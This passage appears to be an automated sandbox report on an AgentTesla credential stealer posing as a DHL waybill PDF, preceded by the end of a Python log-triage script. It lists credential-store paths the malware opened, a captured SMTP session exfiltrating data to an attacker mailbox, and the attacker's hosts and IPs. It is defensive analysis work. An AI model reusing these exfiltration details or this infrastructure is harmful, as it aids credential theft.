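    r"RegSvcs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions",
    r"RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
    r"RegSvcs.exe File opened: C:\FTP Navigator\Ftplist.txt",
    r"RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles",
    r"RegSvcs.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation",
]

if __name__ == "__main__":
    for category, items in sorted(triage(SAMPLE_LINES).items()):
        print(f"{category:20s} {items}")
```

Run on the full report the same classifier also separates the benign volume-information queries from the credential-store opens, and the countdown detector picks up both 1799938-to-1797110 series and the 100000-to-96985 series listed under Malware Analysis System Evasion.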

                      Remote Access Functionality

Source: Yara match, file source: dump.pcap, type: PCAP
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.4515977938.000000000317E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: AWB DHL#40882993049403.pdf.exe PID: 1984, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: RegSvcs.exe PID: 5660, type: MEMORYSTR
MITRE ATT&CK matrix, listed per tactic in matrix order. Bracketed numbers are the count badges the matrix shows on matched techniques, kept as extracted; techniques without a badge are the unmatched cells of the matrix.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation [221]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading [1]; Process Injection [11]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [12]; Software Packing [11]; Timestomp [1]; DLL Side-Loading [1]; Masquerading [11]; Virtualization/Sandbox Evasion [251]; Process Injection [11]
Credential Access: OS Credential Dumping [2]; Input Capture [21]; Credentials in Registry [1]; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery [1]; System Information Discovery [24]; Security Software Discovery [521]; Virtualization/Sandbox Evasion [251]; Application Window Discovery [1]; System Network Configuration Discovery [1]; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]; Input Capture [21]; Clipboard Data [1]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
Antivirus detection (submitted file)
Source | Detection | Scanner | Label
AWB DHL#40882993049403.pdf.exe | 21% | ReversingLabs |
AWB DHL#40882993049403.pdf.exe | 100% | Joe Sandbox ML |
No Antivirus matches for the other scanned artifacts
URL reputation
Source | Detection | Scanner | Label
https://account.dyn.com/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
http://ip-api.com | 0% | URL Reputation | safe
http://mx-out05.natrohost.com | 0% | Avira URL Cloud | safe
http://mail.elektronikkutu.com | 0% | Avira URL Cloud | safe
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mx-out05.natrohost.com | 94.73.188.44 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
mail.elektronikkutu.com | unknown | unknown | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
URLs found in memory or binary data
Name | Source | Malicious | Antivirus Detection | Reputation
http://mail.elektronikkutu.com | RegSvcs.exe, 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://account.dyn.com/ | AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087276155.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4515977938.0000000003121000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | AWB DHL#40882993049403.pdf.exe | false | URL Reputation: safe | unknown
http://mx-out05.natrohost.com | RegSvcs.exe, 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ip-api.com | RegSvcs.exe, 00000003.00000002.4515977938.0000000003121000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
94.73.188.44 | mx-out05.natrohost.com | Turkey | 34619 | CIZGITR | true
General Information
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1466213
Start date and time: 2024-07-02 17:31:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: AWB DHL#40882993049403.pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 131
• Number of non-executed functions: 25
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: AWB DHL#40882993049403.pdf.exe
Timeline
Time | Type | Description
11:32:00 | API Interceptor | 12x Sleep call for process: AWB DHL#40882993049403.pdf.exe modified
11:32:02 | API Interceptor | 11889984x Sleep call for process: RegSvcs.exe modified
Context: IP addresses
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | llD1w4ROY5.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | orden de compra.xlam.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | KWOTASIE.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | ServerManager.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | MicrosoftService.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | F.exe | malicious | AsyncRAT, Neshta, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | x.exe | malicious | AsyncRAT, Neshta, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | java_update.exe | malicious | AsyncRAT, Neshta, XWorm | ip-api.com/line/?fields=hosting
94.73.188.44 | PAYMENT SLIP.com.exe | malicious | AgentTesla |
94.73.188.44 | COTA#U00c7#U00c3O para fornecedores em branco - termometro digital.exe | malicious | AgentTesla |
94.73.188.44 | CTe 002-8-0167948-2.exe | malicious | AgentTesla |
94.73.188.44 | SecuriteInfo.com.Win32.PWSX-gen.10093.13071.exe | malicious | AgentTesla |
94.73.188.44 | SHIPMENT NO-369555440.scr.exe | malicious | AgentTesla |
94.73.188.44 | SecuriteInfo.com.Trojan.PackedNET.2511.647.11120.exe | malicious | AgentTesla |
94.73.188.44 | Payment_Advice-MT103.exe | malicious | AgentTesla |

Context: domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
mx-out05.natrohost.com | PAYMENT SLIP.com.exe | malicious | AgentTesla | 94.73.188.44
mx-out05.natrohost.com | COTA#U00c7#U00c3O para fornecedores em branco - termometro digital.exe | malicious | AgentTesla | 94.73.188.44
mx-out05.natrohost.com | CTe 002-8-0167948-2.exe | malicious | AgentTesla | 94.73.188.44
mx-out05.natrohost.com | SecuriteInfo.com.Win32.PWSX-gen.10093.13071.exe | malicious | AgentTesla | 94.73.188.44
mx-out05.natrohost.com | SHIPMENT NO-369555440.scr.exe | malicious | AgentTesla | 94.73.188.44
mx-out05.natrohost.com | SecuriteInfo.com.Trojan.PackedNET.2511.647.11120.exe | malicious | AgentTesla | 94.73.188.44
mx-out05.natrohost.com | Payment_Advice-MT103.exe | malicious | AgentTesla | 94.73.188.44
ip-api.com | llD1w4ROY5.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
ip-api.com | DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | orden de compra.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
ip-api.com | KWOTASIE.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | ServerManager.exe | malicious | XWorm | 208.95.112.1
ip-api.com | MicrosoftService.exe | malicious | XWorm | 208.95.112.1
ip-api.com | F.exe | malicious | AsyncRAT, Neshta, XWorm | 208.95.112.1
ip-api.com | x.exe | malicious | AsyncRAT, Neshta, XWorm | 208.95.112.1
ip-api.com | java_update.exe | malicious | AsyncRAT, Neshta, XWorm | 208.95.112.1

Context: ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CIZGITR | AWB 112-17259653.exe | malicious | FormBook | 85.159.66.93
CIZGITR | Potvrda narudzbe u prilogu.exe | malicious | DBatLoader, FormBook | 85.159.66.93
CIZGITR | Document TOP19928.exe | malicious | FormBook | 85.159.66.93
CIZGITR | U prilogu lista novih narudzbi.exe | malicious | DBatLoader, FormBook | 85.159.66.93
CIZGITR | PAYMENT SLIP.com.exe | malicious | AgentTesla | 94.73.188.44
CIZGITR | hdBLUdo056.exe | malicious | FormBook | 94.73.151.78
CIZGITR | fiY5fTkFKk.rtf | malicious | FormBook | 94.73.151.78
CIZGITR | tEBdYCAxQC.rtf | malicious | FormBook | 94.73.151.78
CIZGITR | COTA#U00c7#U00c3O para fornecedores em branco - termometro digital.exe | malicious | AgentTesla | 94.73.188.44
CIZGITR | wOoESPII08.exe | malicious | FormBook | 85.159.66.93
TUT-ASUS | llD1w4ROY5.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
TUT-ASUS | DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | orden de compra.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | KWOTASIE.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | ServerManager.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | MicrosoftService.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | F.exe | malicious | AsyncRAT, Neshta, XWorm | 208.95.112.1
TUT-ASUS | x.exe | malicious | AsyncRAT, Neshta, XWorm | 208.95.112.1
TUT-ASUS | java_update.exe | malicious | AsyncRAT, Neshta, XWorm | 208.95.112.1

No context for the remaining context tables
Dropped file
Process: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1301
Entropy (8bit): 5.334025345208678
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
MD5: C8D49A85A61847AAE0536AE8856F6DEC
SHA1: D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
SHA-256: 3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
SHA-512: FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Static file info
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.1695055566876755
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: AWB DHL#40882993049403.pdf.exe
File size: 1'013'256 bytes
MD5: e31da8df37174250f302c4640f97ba15
SHA1: 8fad39b3196f439d96fb662161c868de0dc36b9c
SHA256: 92dc348193523762bc873e593467abfb04b3509f650976608e6c89436eea993f
SHA512: d9d75d8a6e97823556954a2a64a2a177fd1b7fe14694b60256fd541d0bde37c216e3b7786f64efaffac359734e88a268f18fc820e39ab72835f7b72b2d9cccf8
SSDEEP: 24576:bQ8SlsKocVQbsI6uadmVnmI7VH0GkGKCjR8Y:XXKfIkm0I7VHPXjuY
TLSH: 9A251AF4FEE55B3AF1E1AEF33788E5DE512EF2B205165A796B0467012220D504CB7B22
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..6...........U... ...`....@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x4f551e
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xFFBAF889 [Wed Dec 16 21:50:01 2105 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Signature Valid: false
Signature Issuer: CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before: 13/11/2018 01:00:00
Not After: 09/11/2021 00:59:59
Subject Chain: CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version: 3
Thumbprint MD5: DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1: 5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256: 4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial: 7C1118CBBADC95DA3752C46E47A27438
Entrypoint instructions
jmp dword ptr [00402000h]
add byte ptr [eax], al (repeated 97 times; this is the disassembly of the zero bytes that follow the stub jump)
Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf54c9 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf6000 | 0x5a4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xf4000 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf2b3c | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xf3524 | 0xf3600 | 760e43ff73f1abcdf3b5a1902cfd7bf4 | False | 0.6791357697740112 | data | 7.160837106255626 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xf6000 | 0x5a4 | 0x600 | dff63c9db911fafed1a46526db5108d0 | False | 0.4303385416666667 | data | 4.0956163971257045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf8000 | 0xc | 0x200 | 6f0c24164065ef7e2f7538f4a590d484 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xf6090 | 0x314 | data | | | 0.44543147208121825
RT_MANIFEST | 0xf63b4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

Imports
DLL | Import
mscoree.dll | _CorExeMain
Network alerts (Snort IDS)
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/02/24-17:32:05.987984 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49710 | 587 | 192.168.2.5 | 94.73.188.44
07/02/24-17:32:05.987984 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49710 | 587 | 192.168.2.5 | 94.73.188.44
07/02/24-17:32:05.988045 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49710 | 587 | 192.168.2.5 | 94.73.188.44
07/02/24-17:32:05.988045 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49710 | 587 | 192.168.2.5 | 94.73.188.44
07/02/24-17:32:05.988045 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49710 | 587 | 192.168.2.5 | 94.73.188.44
07/02/24-17:32:05.988045 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49710 | 587 | 192.168.2.5 | 94.73.188.44
                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Jul 2, 2024 17:32:02.350795984 CEST | 60308 | 53 | 192.168.2.5 | 1.1.1.1
                                           Jul 2, 2024 17:32:02.358156919 CEST | 53 | 60308 | 1.1.1.1 | 192.168.2.5
                                           Jul 2, 2024 17:32:03.716209888 CEST | 64803 | 53 | 192.168.2.5 | 1.1.1.1
                                           Jul 2, 2024 17:32:03.873982906 CEST | 53 | 64803 | 1.1.1.1 | 192.168.2.5
                                           Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                           Jul 2, 2024 17:32:02.350795984 CEST | 192.168.2.5 | 1.1.1.1 | 0x5bb0 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                           Jul 2, 2024 17:32:03.716209888 CEST | 192.168.2.5 | 1.1.1.1 | 0x3f91 | Standard query (0) | mail.elektronikkutu.com | A (IP address) | IN (0x0001) | false
                                           Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                           Jul 2, 2024 17:32:02.358156919 CEST | 1.1.1.1 | 192.168.2.5 | 0x5bb0 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                           Jul 2, 2024 17:32:03.873982906 CEST | 1.1.1.1 | 192.168.2.5 | 0x3f91 | No error (0) | mail.elektronikkutu.com | mx-out05.natrohost.com | | CNAME (Canonical name) | IN (0x0001) | false
                                           Jul 2, 2024 17:32:03.873982906 CEST | 1.1.1.1 | 192.168.2.5 | 0x3f91 | No error (0) | mx-out05.natrohost.com | | 94.73.188.44 | A (IP address) | IN (0x0001) | false
                                          • ip-api.com
                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           0 | 192.168.2.5 | 49708 | 208.95.112.1 | 80 | 5660 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 2, 2024 17:32:02.377576113 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                               Host: ip-api.com
                                               Connection: Keep-Alive
                                           Jul 2, 2024 17:32:02.853199005 CEST | 175 | IN | HTTP/1.1 200 OK
                                               Date: Tue, 02 Jul 2024 15:32:01 GMT
                                               Content-Type: text/plain; charset=utf-8
                                               Content-Length: 6
                                               Access-Control-Allow-Origin: *
                                               X-Ttl: 60
                                               X-Rl: 44
                                               Data Raw: 66 61 6c 73 65 0a
                                               Data Ascii: false


                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                           Jul 2, 2024 17:32:04.511312962 CEST | 587 | 49710 | 94.73.188.44 | 192.168.2.5 | 220 vsp-in13.natrohost.com ESMTP
                                           Jul 2, 2024 17:32:04.511496067 CEST | 49710 | 587 | 192.168.2.5 | 94.73.188.44 | EHLO 849224
                                           Jul 2, 2024 17:32:04.732882977 CEST | 587 | 49710 | 94.73.188.44 | 192.168.2.5 | 250-vsp-in13.natrohost.com
                                               250-PIPELINING
                                               250-SIZE 52428800
                                               250-STARTTLS
                                               250-AUTH LOGIN PLAIN
                                               250-ENHANCEDSTATUSCODES
                                               250 8BITMIME
                                           Jul 2, 2024 17:32:04.733956099 CEST | 49710 | 587 | 192.168.2.5 | 94.73.188.44 | AUTH login aW5mb0BlbGVrdHJvbmlra3V0dS5jb20=
                                           Jul 2, 2024 17:32:04.953203917 CEST | 587 | 49710 | 94.73.188.44 | 192.168.2.5 | 334 UGFzc3dvcmQ6
                                           Jul 2, 2024 17:32:05.183937073 CEST | 587 | 49710 | 94.73.188.44 | 192.168.2.5 | 235 2.7.0 Ok
                                           Jul 2, 2024 17:32:05.184191942 CEST | 49710 | 587 | 192.168.2.5 | 94.73.188.44 | MAIL FROM:<info@elektronikkutu.com>
                                           Jul 2, 2024 17:32:05.544742107 CEST | 587 | 49710 | 94.73.188.44 | 192.168.2.5 | 250 2.1.0 Ok
                                           Jul 2, 2024 17:32:05.546382904 CEST | 49710 | 587 | 192.168.2.5 | 94.73.188.44 | RCPT TO:<smt.treat@yandex.com>
                                           Jul 2, 2024 17:32:05.766474009 CEST | 587 | 49710 | 94.73.188.44 | 192.168.2.5 | 250 2.1.5 Ok
                                           Jul 2, 2024 17:32:05.766946077 CEST | 49710 | 587 | 192.168.2.5 | 94.73.188.44 | DATA
                                           Jul 2, 2024 17:32:05.987466097 CEST | 587 | 49710 | 94.73.188.44 | 192.168.2.5 | 354 End data with <CR><LF>.<CR><LF>
                                           Jul 2, 2024 17:32:05.988084078 CEST | 49710 | 587 | 192.168.2.5 | 94.73.188.44 | .
                                           Jul 2, 2024 17:32:06.754036903 CEST | 587 | 49710 | 94.73.188.44 | 192.168.2.5 | 250 2.0.0 Ok: queued as 3bee0651-3888-11ef-bf4f-6f88f3e6c78f
                                           Jul 2, 2024 17:33:43.735503912 CEST | 49710 | 587 | 192.168.2.5 | 94.73.188.44 | QUIT


                                          Target ID:0
                                          Start time:11:31:58
                                          Start date:02/07/2024
                                          Path:C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe"
                                          Imagebase:0xa60000
                                          File size:1'013'256 bytes
                                          MD5 hash:E31DA8DF37174250F302C4640F97BA15
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:11:32:01
                                          Start date:02/07/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
